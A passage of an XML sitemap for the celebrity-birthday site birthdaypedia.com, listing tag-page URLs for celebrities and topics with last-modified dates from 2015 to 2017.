<lastmod>2015-10-14T16:22:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/alyson-stoner/</loc>\n <lastmod>2015-10-14T14:12:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/amber-heard/</loc>\n <lastmod>2015-10-14T17:33:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/americas-best-voice/</loc>\n <lastmod>2015-10-14T14:32:59+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-actors-winner-at-cannes-film-festival/</loc>\n <lastmod>2015-10-14T18:30:13+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-actress/</loc>\n <lastmod>2015-10-14T18:21:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-entrepeneur/</loc>\n <lastmod>2015-10-09T18:38:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-football/</loc>\n <lastmod>2015-10-14T15:48:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-idol-celebrities/</loc>\n <lastmod>2015-10-14T14:32:59+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-idol-judges/</loc>\n <lastmod>2015-10-14T18:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-literature/</loc>\n <lastmod>2016-11-23T03:17:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-model/</loc>\n <lastmod>2015-10-14T14:10:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/american-professional-wrestling/</loc>\n <lastmod>2015-10-14T14:32:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/amy-adams/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/amy-winehouse/</loc>\n <lastmod>2015-10-09T16:47:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/anaconda-cast/</loc>\n <lastmod>2015-10-09T19:21:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/anderson-hays-cooper/</loc>\n <lastmod>2015-10-14T16:32:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/andrea-bocelli/</loc>\n <lastmod>2015-10-09T16:41:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/andrea-pirlo/</loc>\n <lastmod>2015-10-14T16:22:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/andrew-sarah-ferguson/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/angelina-jolie/</loc>\n <lastmod>2015-10-14T17:09:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/angelina-jolie-voight/</loc>\n <lastmod>2015-10-14T17:09:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/angels-hard-as-they-come-cast/</loc>\n <lastmod>2015-10-14T18:19:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/anime/</loc>\n <lastmod>2015-10-09T18:23:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/antonio-banderas/</loc>\n <lastmod>2015-10-14T18:44:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/argentina/</loc>\n <lastmod>2015-10-14T18:13:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/argentinian-basketbal-player/</loc>\n <lastmod>2015-10-09T19:12:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/argentinian-soccer-player/</loc>\n <lastmod>2015-10-14T18:13:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ariana-grande/</loc>\n <lastmod>2015-10-14T18:18:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ariana-grande-career/</loc>\n <lastmod>2015-10-14T18:18:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/arkansas-musician/</loc>\n <lastmod>2015-10-14T18:24:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/armani-fashion-designs/</loc>\n <lastmod>2015-10-14T18:26:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/arnold-schwarzenegger/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/artists-born-in-october/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/as-good-as-it-gets/</loc>\n <lastmod>2015-10-13T19:53:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/astronomy/</loc>\n <lastmod>2016-11-28T22:24:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/attorney-general-of-the-united-states/</loc>\n <lastmod>2016-11-28T16:16:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/audionet-creator/</loc>\n <lastmod>2015-10-09T18:38:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/barack-obama/</loc>\n <lastmod>2015-10-09T18:24:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/barry-goosey/</loc>\n <lastmod>2015-10-14T18:19:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/barry-manilow/</loc>\n <lastmod>2015-10-14T17:57:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/baseball-birthdays/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/basketball/</loc>\n <lastmod>2015-10-14T14:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/baywatch-celebrities/</loc>\n <lastmod>2015-10-14T18:20:46+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/baywatch-star/</loc>\n <lastmod>2015-10-14T18:42:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/beatles/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bernie-mac/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bernie-mac-birthday/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bernie-mac-comedian/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bernie-mac-dead/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bernie-mac-death/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bernie-mac-die/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-actor/</loc>\n <lastmod>2015-10-14T20:39:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-chef/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-comedy-movies/</loc>\n <lastmod>2015-10-14T18:44:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-female-vocalist/</loc>\n <lastmod>2015-10-09T19:11:54+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-funk-singer/</loc>\n <lastmod>2015-10-14T16:25:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-male-rock-vocal-performance-grammy/</loc>\n <lastmod>2015-10-14T16:25:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-midfielder/</loc>\n <lastmod>2015-10-14T16:22:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-rb-singer/</loc>\n <lastmod>2015-10-14T16:28:24+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-rapper/</loc>\n <lastmod>2015-10-14T17:27:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-rapper-ever/</loc>\n <lastmod>2015-10-14T18:22:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-soccer-player/</loc>\n <lastmod>2015-10-14T18:13:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/best-soccer-team/</loc>\n <lastmod>2015-10-14T18:13:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/beyonce/</loc>\n <lastmod>2015-10-09T16:56:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/beyonce-knowles/</loc>\n <lastmod>2015-10-09T16:56:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bicentennial-man-cast/</loc>\n <lastmod>2015-10-14T18:44:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/billboard-hot-country-songs/</loc>\n <lastmod>2015-10-14T16:28:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/biografia-pablo-picasso/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/birth/</loc>\n <lastmod>2015-10-09T16:51:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/birthday/</loc>\n <lastmod>2015-10-09T16:52:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/birthdaypedia/</loc>\n <lastmod>2015-10-09T16:51:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/blonde-celebrity/</loc>\n <lastmod>2015-10-14T14:11:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/blonde-model/</loc>\n <lastmod>2015-10-14T14:10:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bloodsport-cast/</loc>\n <lastmod>2015-10-14T18:30:13+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/brandon-blackstone/</loc>\n <lastmod>2015-10-14T14:32:59+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/british-actor/</loc>\n <lastmod>2015-10-09T19:21:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/british-comedian/</loc>\n <lastmod>2015-10-14T17:33:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/british-monarchy/</loc>\n <lastmod>2016-11-28T19:10:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/british-musician/</loc>\n <lastmod>2015-10-14T18:23:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/british-personalities/</loc>\n <lastmod>2016-11-28T19:10:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bruce-jenner/</loc>\n <lastmod>2016-11-28T22:46:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bryce-harper/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bryce-harper-baseball/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bryce-harper-bio/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bryce-harper-birthday/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bryce-harper-facts/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bryce-harper-nationals/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/bryce-harper-stats/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/california-governor/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/california-state-university-celebrities/</loc>\n <lastmod>2015-10-14T18:24:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/calvin-klein/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/cara-delevingne/</loc>\n <lastmod>2015-10-14T14:13:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carl-sagan/</loc>\n <lastmod>2016-11-28T22:24:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carole-lombard/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carole-lombard-actress/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carole-lombard-biography/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carole-lombard-birthday/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carole-lombard-crash/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carole-lombard-death/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/carole-lombard-photos/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/casey-kasem/</loc>\n <lastmod>2015-10-14T14:33:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ccw-wrestling/</loc>\n <lastmod>2015-10-14T16:23:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebreity-supporting-unicef/</loc>\n <lastmod>2015-10-14T18:44:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrities-born-in-october/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrities-born-october-4/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrities-born-on-october-23/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrities-born-on-october-5/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrities-from-pennsylvania/</loc>\n <lastmod>2015-10-14T18:29:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrities-in-dancing-with-the-stars/</loc>\n <lastmod>2015-10-14T18:42:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrities-in-politics/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebrity-big-brother/</loc>\n <lastmod>2015-10-14T16:28:24+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/celebs-born-in-october/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/channer-4-stars/</loc>\n <lastmod>2015-10-14T18:13:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/charlie-cast/</loc>\n <lastmod>2015-10-14T18:29:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/charlie-sheen/</loc>\n <lastmod>2015-10-09T17:07:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/charlize-theron/</loc>\n <lastmod>2015-10-14T14:11:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/chef/</loc>\n <lastmod>2016-11-28T22:30:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/cher/</loc>\n <lastmod>2015-10-14T16:22:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/cher-bio/</loc>\n <lastmod>2015-10-14T16:22:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/chers-life/</loc>\n <lastmod>2015-10-14T16:22:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/chris-brown/</loc>\n <lastmod>2015-10-14T14:58:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/clark-gable/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/classical-songs/</loc>\n <lastmod>2015-10-09T16:41:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/colombian-celebrities/</loc>\n <lastmod>2015-10-14T18:25:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/comedian/</loc>\n <lastmod>2016-11-28T19:30:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/comedian-actor/</loc>\n <lastmod>2015-10-14T14:26:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/comedian-movies/</loc>\n <lastmod>2015-10-14T14:26:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/comedic-films/</loc>\n <lastmod>2016-11-28T16:11:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/comedy/</loc>\n <lastmod>2015-10-09T16:52:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/comedy-series/</loc>\n <lastmod>2015-10-14T14:26:47+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/cosmetics/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/cosmos/</loc>\n <lastmod>2016-11-28T22:24:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/cosplay/</loc>\n <lastmod>2015-10-09T18:23:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/cougar-town/</loc>\n <lastmod>2015-10-14T17:51:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/country-legend-tim-mcgraw/</loc>\n <lastmod>2015-10-14T14:36:15+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/country-music/</loc>\n <lastmod>2015-10-14T14:57:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/country-music-artist/</loc>\n <lastmod>2015-10-14T18:24:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/country-music-singer/</loc>\n <lastmod>2015-10-14T16:28:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/courteney-cox/</loc>\n <lastmod>2015-10-14T17:51:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dallas-mavericks-basketball-team/</loc>\n <lastmod>2015-10-09T18:38:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/danny-devito/</loc>\n <lastmod>2016-11-28T16:44:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/debbie-gibson/</loc>\n <lastmod>2015-10-14T14:23:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/destinys-child/</loc>\n <lastmod>2015-10-09T16:56:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dianna-argon/</loc>\n <lastmod>2015-10-14T14:34:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/director/</loc>\n <lastmod>2016-11-28T16:44:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/disney-celebrities/</loc>\n <lastmod>2015-10-14T18:44:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/disney-star/</loc>\n <lastmod>2015-10-14T18:21:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/disney-star-with-criminal-record/</loc>\n <lastmod>2015-10-14T18:21:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dogtown-skateboards/</loc>\n <lastmod>2015-10-14T15:51:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dr-house/</loc>\n <lastmod>2015-10-14T17:33:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/drake/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/drake-josh/</loc>\n <lastmod>2015-10-14T15:54:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/drake-birthday/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/drake-facts/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/drakes-real-name/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/drug-abuse/</loc>\n <lastmod>2016-11-28T22:40:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/duchess-of-york/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/duchess-sarah-ferguson/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/duckman/</loc>\n <lastmod>2015-10-14T16:26:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/duckmen-dvd-series/</loc>\n <lastmod>2015-10-14T16:26:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/duke-of-cornwall/</loc>\n <lastmod>2016-11-28T19:10:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dwayne-the-rock-johnson/</loc>\n <lastmod>2015-10-14T14:57:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dwayne-johnson/</loc>\n <lastmod>2015-10-14T14:57:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dwight-d-eisenhower/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dwight-eisenhower/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dwight-eisenhower-bio/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dwight-eisenhower-birthday/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/dwight-eisenhower-facts/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/edward-norton/</loc>\n <lastmod>2017-06-20T16:08:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt-age/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt-bio/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt-birthday/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt-children/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt-death/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt-facts/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eleanor-roosevelt-real-name/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eminem/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eminem-bio/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eminem-birthday/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eminem-facts/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/eminem-real-name/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/emmy-award/</loc>\n <lastmod>2015-10-09T16:55:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/english-comedian/</loc>\n <lastmod>2015-10-14T18:13:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/enrique-iglesias/</loc>\n <lastmod>2015-10-14T15:50:31+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield-age/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield-bio/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield-birthday/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield-boxer/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield-career/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield-facts/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/evander-holyfield-mike-tyson/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/experimental-music/</loc>\n <lastmod>2016-11-28T15:17:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-actor-and-musician/</loc>\n <lastmod>2015-10-14T18:42:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-actress/</loc>\n <lastmod>2015-10-14T18:20:46+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-american-wrestler/</loc>\n <lastmod>2015-10-09T19:14:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-bodybuilder/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-boxer/</loc>\n <lastmod>2015-10-14T18:20:00+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-chefs/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-country-musician/</loc>\n <lastmod>2015-10-14T18:24:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-guitarist/</loc>\n <lastmod>2015-10-14T18:43:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-journalist/</loc>\n <lastmod>2015-10-14T16:32:18+00:00</lastmod>\n </url>\n <url>\n 